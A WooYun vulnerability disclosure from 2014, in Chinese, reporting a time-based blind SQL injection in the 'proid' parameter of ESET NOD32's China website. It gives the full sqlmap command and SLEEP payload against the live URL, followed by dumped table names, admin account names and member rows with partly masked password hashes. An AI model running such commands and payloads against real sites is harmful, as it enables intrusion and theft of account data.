当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049058

漏洞标题:ESET NOD32中国官网SQL注入漏洞

相关厂商:ESET NOD32

漏洞作者: 秋风

提交时间:2014-01-16 14:47

修复时间:2014-03-02 14:48

公开时间:2014-03-02 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-16: 细节已通知厂商并且等待厂商处理中
2014-01-16: 厂商已经确认,细节仅向厂商公开
2014-01-26: 细节向核心白帽子及相关领域专家公开
2014-02-05: 细节向普通白帽子公开
2014-02-15: 细节向实习白帽子公开
2014-03-02: 细节向公众公开

简要描述:

0.0

详细说明:

time-based类型注入,目测能出数据,只是出得比较慢!
注入点:http://www.eset.com.cn/share/getLang.php
POST参数proid存在注入
通知存在注入点,未做进一步测试!

python sqlmap.py -u "http://www.eset.com.cn/share/getLang.php" --data "a=eset-hk-lang&os=-1&proid=73" -p "proid" --dbs --batch
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: proid
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=eset-hk-lang&os=-1&proid=73' AND SLEEP(5) AND 'rPqb'='rPqb
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] eset_com_cn_new
[*] information_schema
Database: eset_com_cn_new
[74 tables]
+----------------------------+
| diy_cdkey                  |
| diy_cdkey_edition          |
| diy_reg                    |
| diy_sn                     |
| diy_sn_edition             |
| download_documentation     |
| download_installer         |
| download_product           |
| eset_images                |
| eset_large                 |
| eset_register              |
| eset_sme                   |
| eset_windows               |
| phpcms_admin               |
| phpcms_admin_role          |
| phpcms_admin_role_priv     |
| phpcms_area                |
| phpcms_attachment          |
| phpcms_author              |
| phpcms_block               |
| phpcms_c_down              |
| phpcms_c_info              |
| phpcms_c_info_old          |
| phpcms_c_ku6video          |
| phpcms_c_news              |
| phpcms_c_news_old          |
| phpcms_c_picture           |
| phpcms_c_product           |
| phpcms_c_video             |
| phpcms_cache_count         |
| phpcms_category            |
| phpcms_collect             |
| phpcms_comment             |
| phpcms_content             |
| phpcms_content_count       |
| phpcms_content_position    |
| phpcms_content_tag         |
| phpcms_copyfrom            |
| phpcms_datasource          |
| phpcms_digg                |
| phpcms_formguide           |
| phpcms_formguide_fields    |
| phpcms_hits                |
| phpcms_ipbanned            |
| phpcms_keylink             |
| phpcms_keyword             |
| phpcms_link                |
| phpcms_log                 |
| phpcms_member              |
| phpcms_member_cache        |
| phpcms_member_company      |
| phpcms_member_detail       |
| phpcms_member_group        |
| phpcms_member_group_extend |
| phpcms_member_group_priv   |
| phpcms_member_info         |
| phpcms_menu                |
| phpcms_model               |
| phpcms_model_field         |
| phpcms_module              |
| phpcms_player              |
| phpcms_position            |
| phpcms_process             |
| phpcms_process_status      |
| phpcms_role                |
| phpcms_search              |
| phpcms_search_type         |
| phpcms_session             |
| phpcms_status              |
| phpcms_times               |
| phpcms_type                |
| phpcms_urlrule             |
| phpcms_workflow            |
| regkeyreplace              |
+----------------------------+
Database: eset_com_cn_new
Table: phpcms_admin
[3 entries]
+--------+-----------+----------+-----------------+-------------------+-----------------------+
| userid | username  | disabled | allowmultilogin | alloweditpassword | editpasswordnextlogin |
+--------+-----------+----------+-----------------+-------------------+-----------------------+
| 1      | v2esetwww | 0        | 1               | 1                 | 0                     |
| 2      | wwwesetv2 | 0        | 0               | 1                 | 0                     |
| 4      | linqiang  | 0        | 0               | 0                 | 0                     |
+--------+-----------+----------+-----------------+-------------------+-----------------------+
Database: eset_com_cn_new
Table: phpcms_member 部分数据
+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+
| areaid | userid | groupid | modelid | touserid | point | email                     | amount | message | username  | disabled | password                         |
+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+
| 0      | 4      | 1       | 10      | 0        | 0     | [email protected] | 0.00   | 0       | linqiang  | 0        | d665b1481fa**********b010357fa5f |
| 0      | 1      | 1       | 10      | 0        | 0     | [email protected]         | 0.00   | 0       | v2esetwww | 0        | 2d1bc2d7b41**********e3b883ee4c6 |
| 0      | 2      | 1       | 10      | 0        | 0     | [email protected]        | 0.00   | 0       | wwwesetv2 | 0        | aaa6e5a7fd3**********27dd68d9d9d |
| 0      | 3      | 6       | 10      | 0        | 0     | [email protected]         | 0.00   | 0       | eset      | 0        | 59efb956453**********990d5cf5cd3 |
+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+

漏洞证明:

_824.png

修复方案:

过滤

版权声明:转载请注明来源 秋风@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-16 15:21

厂商回复:

感谢您的反馈,已经通知程序员检查。

最新状态:

暂无